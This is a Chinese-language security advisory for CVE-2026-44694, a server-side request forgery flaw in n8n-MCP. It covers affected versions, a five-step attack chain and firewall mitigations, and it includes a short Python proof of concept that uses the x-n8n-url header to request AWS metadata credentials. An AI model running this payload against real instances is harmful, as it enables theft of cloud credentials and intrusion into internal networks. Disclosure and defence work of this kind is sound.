CVE-2026-44694 CVSS 9.1 严重

CVE-2026-44694 n8n-MCP 服务端请求伪造漏洞

披露日期: 2026-05-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44694

漏洞类型

服务端请求伪造（SSRF）

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

n8n-MCP

漏洞概述

n8n-MCP 在版本 2.18.7 至 2.50.2 之前存在严重的经过身份验证的服务端请求伪造（SSRF）漏洞。该漏洞影响了 webhook 触发器工具、n8n API 客户端以及多租户 HTTP 模式下通过 x-n8n-url header 传递的 URL。由于对用户提供的 URL 验证不足，经过身份验证的攻击者可利用此漏洞诱导服务器向内网或其他受限资源发起恶意请求，从而造成敏感信息泄露或绕过防火墙限制。

技术细节

该漏洞的根源在于 n8n-MCP 在处理外部输入的 URL 时，缺乏足够的安全校验机制。具体受影响的组件包括 webhook 触发器、N8N_API_URL 配置项以及多租户 HTTP 模式下的 x-n8n-url 请求头。攻击者在获得低权限账户认证后，可以通过构造特殊的 HTTP 请求，将目标 URL 设置为内网地址（如 127.0.0.1、10.0.0.0/8 或云元数据服务地址）。由于服务器端未对目标地址进行白名单过滤或 DNS 重绑定检测，应用程序会直接代为向攻击者指定的内网资源发起 HTTP 请求。这种 SSRF 漏洞不仅允许攻击者扫描内网端口、读取本地敏感文件（如 /etc/passwd）或窃取云服务凭证，还可能结合其他漏洞对内部系统进行进一步的渗透和攻击，造成数据泄露或服务中断。鉴于 CVSS 评分为 9.1，其危害极高，企业需高度重视此风险。

攻击链分析

STEP 1

侦察与枚举

攻击者识别目标网络上运行的 n8n-MCP 实例及其版本号。

STEP 2

获取凭证

攻击者通过钓鱼或其他手段获取一个低权限账户的认证 Token（满足 PR:L 要求）。

STEP 3

构造恶意请求

攻击者利用获取的 Token，向 webhook 或 API 端点发送请求，在 x-n8n-url header 或 N8N_API_URL 中填入内网敏感地址（如 127.0.0.1 或云元数据地址）。

STEP 4

执行 SSRF 攻击

n8n-MCP 服务器解析请求并代为向内网目标发起连接，返回响应数据给攻击者。

STEP 5

数据泄露与后续利用

攻击者获取内网敏感信息（如 AWS 凭证），并利用这些凭证进一步渗透内部网络。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-44694 (SSRF in n8n-MCP)
import requests

target_url = "http://vulnerable-n8n-mcp-instance/api/trigger"
# Simulating an attacker trying to access internal metadata service
malicious_url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

headers = {
    "Authorization": "Bearer <valid_low_privilege_token>", # PR:L is required
    "x-n8n-url": malicious_url, # Vulnerable header in multi-tenant mode
    "Content-Type": "application/json"
}

data = {"node_params": {}}

try:
    response = requests.post(target_url, json=data, headers=headers)
    if response.status_code == 200:
        print("[+] SSRF successful! Response from internal service:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

n8n-MCP >= 2.18.7, < 2.50.2

防御指南

临时缓解措施

在无法立即升级的情况下，建议管理员在防火墙或安全组层面阻断 n8n-MCP 实例对 RFC1918 定义的内网地址（如 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16）及链路本地地址（169.254.0.0/16）的访问。同时，应密切监控日志中是否存在针对内网 IP 的异常请求记录。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表